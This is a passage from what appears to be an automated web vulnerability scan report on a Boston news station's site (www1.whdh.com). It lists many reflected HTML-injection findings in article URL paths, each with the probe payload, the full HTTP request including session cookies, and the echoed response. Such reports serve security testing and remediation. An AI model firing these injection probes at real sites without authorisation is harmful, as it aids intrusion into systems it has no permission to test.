<meta name="publisher" content="New England News Station Boston
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/dish/BO144797ab001\"><a>7bdcb52ea9d/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1864. http://www1.whdh.com/features/articles/dish/BO144833/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/dish/BO144833/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605d8"><a>2ca3bfe2d55 was submitted in the REST URL parameter 4. This input was echoed as 605d8\"><a>2ca3bfe2d55 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/dish/BO144833605d8"><a>2ca3bfe2d55/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:46 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:06 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close
Content-Length: 11914

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - </title>
<meta name="publisher" content="New England News Station Boston
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/dish/BO144833605d8\"><a>2ca3bfe2d55/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1865. http://www1.whdh.com/features/articles/hank/BO144372/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/hank/BO144372/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e53b"><a>d8417674324 was submitted in the REST URL parameter 4. This input was echoed as 4e53b\"><a>d8417674324 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hank/BO1443724e53b"><a>d8417674324/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:14 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:34 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close
Content-Length: 11959

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - </title>
<meta name="publisher" content="New England News Statio
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hank/BO1443724e53b\"><a>d8417674324/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1866. http://www1.whdh.com/features/articles/hank/BO144452/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/hank/BO144452/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc43"><a>00199ee1503 was submitted in the REST URL parameter 4. This input was echoed as 8cc43\"><a>00199ee1503 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hank/BO1444528cc43"><a>00199ee1503/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:12 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7151
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:34 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close
Content-Length: 11959

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - </title>
<meta name="publisher" content="New England News Statio
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hank/BO1444528cc43\"><a>00199ee1503/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1867. http://www1.whdh.com/features/articles/hank/BO144489/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/hank/BO144489/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5e60"><a>d738f217fec was submitted in the REST URL parameter 4. This input was echoed as e5e60\"><a>d738f217fec in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hank/BO144489e5e60"><a>d738f217fec/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:12 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:32 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close
Content-Length: 11959

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - </title>
<meta name="publisher" content="New England News Statio
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hank/BO144489e5e60\"><a>d738f217fec/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1868. http://www1.whdh.com/features/articles/hank/BO144588/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/hank/BO144588/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 258ae"><a>2a536c67b5b was submitted in the REST URL parameter 4. This input was echoed as 258ae\"><a>2a536c67b5b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hank/BO144588258ae"><a>2a536c67b5b/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:12 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:32 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close
Content-Length: 11959

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - </title>
<meta name="publisher" content="New England News Statio
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hank/BO144588258ae\"><a>2a536c67b5b/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1869. http://www1.whdh.com/features/articles/hiller/BO144771/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144771/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33552"><a>1e0ed6ad923 was submitted in the REST URL parameter 4. This input was echoed as 33552\"><a>1e0ed6ad923 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hiller/BO14477133552"><a>1e0ed6ad923/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:57 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close
Content-Length: 11981

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - </title>
<meta name="publisher" content="New England News Stat
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hiller/BO14477133552\"><a>1e0ed6ad923/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1870. http://www1.whdh.com/features/articles/hiller/BO144776/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144776/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425a7"><a>418a61b9cc5 was submitted in the REST URL parameter 4. This input was echoed as 425a7\"><a>418a61b9cc5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hiller/BO144776425a7"><a>418a61b9cc5/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:56 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7151
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close
Content-Length: 11981

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - </title>
<meta name="publisher" content="New England News Stat
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hiller/BO144776425a7\"><a>418a61b9cc5/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1871. http://www1.whdh.com/features/articles/hiller/BO144796/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144796/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 359b8"><a>9f425241799 was submitted in the REST URL parameter 4. This input was echoed as 359b8\"><a>9f425241799 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hiller/BO144796359b8"><a>9f425241799/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:54 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:15 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close
Content-Length: 11981

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - </title>
<meta name="publisher" content="New England News Stat
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hiller/BO144796359b8\"><a>9f425241799/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1872. http://www1.whdh.com/features/articles/hiller/BO144813/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144813/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86139"><a>0a3ffc39662 was submitted in the REST URL parameter 4. This input was echoed as 86139\"><a>0a3ffc39662 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hiller/BO14481386139"><a>0a3ffc39662/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:54 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:14 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close
Content-Length: 11981

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - </title>
<meta name="publisher" content="New England News Stat
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hiller/BO14481386139\"><a>0a3ffc39662/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1873. http://www1.whdh.com/features/articles/hiller/BO144841/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144841/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73919"><a>f70591e73e1 was submitted in the REST URL parameter 4. This input was echoed as 73919\"><a>f70591e73e1 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/hiller/BO14484173919"><a>f70591e73e1/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:51 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:12 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close
Content-Length: 11981

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - </title>
<meta name="publisher" content="New England News Stat
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/hiller/BO14484173919\"><a>f70591e73e1/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1874. http://www1.whdh.com/features/articles/holiday_helping/BO144709/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144709/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 858e5"><a>f396a0cf518 was submitted in the REST URL parameter 4. This input was echoed as 858e5\"><a>f396a0cf518 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/holiday_helping/BO144709858e5"><a>f396a0cf518/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:07 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:27 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close
Content-Length: 12009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - </title>
<meta name="publisher" content="New England News Station
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/holiday_helping/BO144709858e5\"><a>f396a0cf518/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1875. http://www1.whdh.com/features/articles/holiday_helping/BO144719/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144719/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0875"><a>c7bf7737f8f was submitted in the REST URL parameter 4. This input was echoed as d0875\"><a>c7bf7737f8f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/holiday_helping/BO144719d0875"><a>c7bf7737f8f/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:06 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:27 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close
Content-Length: 12009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - </title>
<meta name="publisher" content="New England News Station
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/holiday_helping/BO144719d0875\"><a>c7bf7737f8f/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1876. http://www1.whdh.com/features/articles/holiday_helping/BO144727/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144727/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b13e8"><a>1fc488627eb was submitted in the REST URL parameter 4. This input was echoed as b13e8\"><a>1fc488627eb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/holiday_helping/BO144727b13e8"><a>1fc488627eb/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:59 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7151
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:21 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close
Content-Length: 12009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - </title>
<meta name="publisher" content="New England News Station
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/holiday_helping/BO144727b13e8\"><a>1fc488627eb/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1877. http://www1.whdh.com/features/articles/holiday_helping/BO144733/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144733/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e840b"><a>5b88da6bb42 was submitted in the REST URL parameter 4. This input was echoed as e840b\"><a>5b88da6bb42 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/holiday_helping/BO144733e840b"><a>5b88da6bb42/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:57 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
